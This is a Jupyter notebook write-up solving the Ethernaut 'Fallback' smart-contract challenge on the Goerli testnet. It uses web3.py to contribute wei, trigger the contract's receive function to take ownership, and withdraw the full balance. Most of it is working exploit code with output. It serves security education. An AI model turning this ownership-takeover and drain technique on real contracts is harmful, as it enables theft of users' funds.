![](https://ethernaut.openzeppelin.com/imgs/BigLevel1.svg)
# (01) Fallback
## https://ethernaut.openzeppelin.com/level/0x80934BE6B8B872B364b470Ca30EaAd8AEAC4f63F

#### Looking at the contract, we see that there is a receive method that sets the sender as the owner. To call it, we first need to contribute a non-zero number of wei, and then we send a transaction to the contract address with some wei but without calling any particular function. The receive method serves as a fallback for when the contract receives a transaction that isn't directed at any of its functions. After we become the owner, we can withdraw the contract balance.

In [1]:
from web3 import Web3
from dotenv import load_dotenv
from IPython.display import display, HTML
import os
import json

load_dotenv()

provider_url = 'https://goerli.infura.io/v3/69194ec6319d4463b70ef7215e7ee7a7'
web3 = Web3(Web3.HTTPProvider(provider_url))
account = '0xf0522A86a6BEb833F9E988596Fc9dF2F5CdD9C55'
private_key = os.getenv('PRIVATE_KEY')

In [14]:
with open('abi/fallback_abi.json', 'r') as f:
	abi = json.load(f)

contract_address = '0x673ccf613Be3982e93F2C6Ba7BA067692fC2109a'

contract = web3.eth.contract(address=contract_address, abi=abi)

In [5]:
tx = {
    'nonce': web3.eth.getTransactionCount(account),
    'gas': 2000000,
    'gasPrice': web3.toWei('50', 'gwei'),
    'value': 100
}

tx = contract.functions.contribute().build_transaction(tx)

signed_tx = web3.eth.account.sign_transaction(tx, private_key)

tx_hash = web3.eth.sendRawTransaction(signed_tx.rawTransaction)

display(HTML(f'<a href="https://goerli.etherscan.io/tx/{web3.toHex(tx_hash)}">{web3.toHex(tx_hash)}</a>'))

In [15]:
web3.eth.get_balance(contract_address)

100

In [16]:
nonce = web3.eth.getTransactionCount(account)

tx = {
    'nonce': nonce,
    'to': contract_address,
    'value': web3.toWei(0.001, 'ether'),
    'gas': 2000000,
    'gasPrice': web3.toWei('50', 'gwei')
}

signed_tx = web3.eth.account.sign_transaction(tx, private_key)

tx_hash = web3.eth.sendRawTransaction(signed_tx.rawTransaction)

display(HTML(f'<a href="https://goerli.etherscan.io/tx/{web3.toHex(tx_hash)}">{web3.toHex(tx_hash)}</a>'))

In [17]:
contract.functions.owner().call()

'0xf0522A86a6BEb833F9E988596Fc9dF2F5CdD9C55'

In [18]:
tx = {
    'nonce': web3.eth.getTransactionCount(account),
    'gas': 2000000,
    'gasPrice': web3.toWei('50', 'gwei'),
}

tx = contract.functions.withdraw().build_transaction(tx)

signed_tx = web3.eth.account.sign_transaction(tx, private_key)

tx_hash = web3.eth.sendRawTransaction(signed_tx.rawTransaction)

display(HTML(f'<a href="https://goerli.etherscan.io/tx/{web3.toHex(tx_hash)}">{web3.toHex(tx_hash)}</a>'))

In [19]:
web3.eth.get_balance(contract_address)

0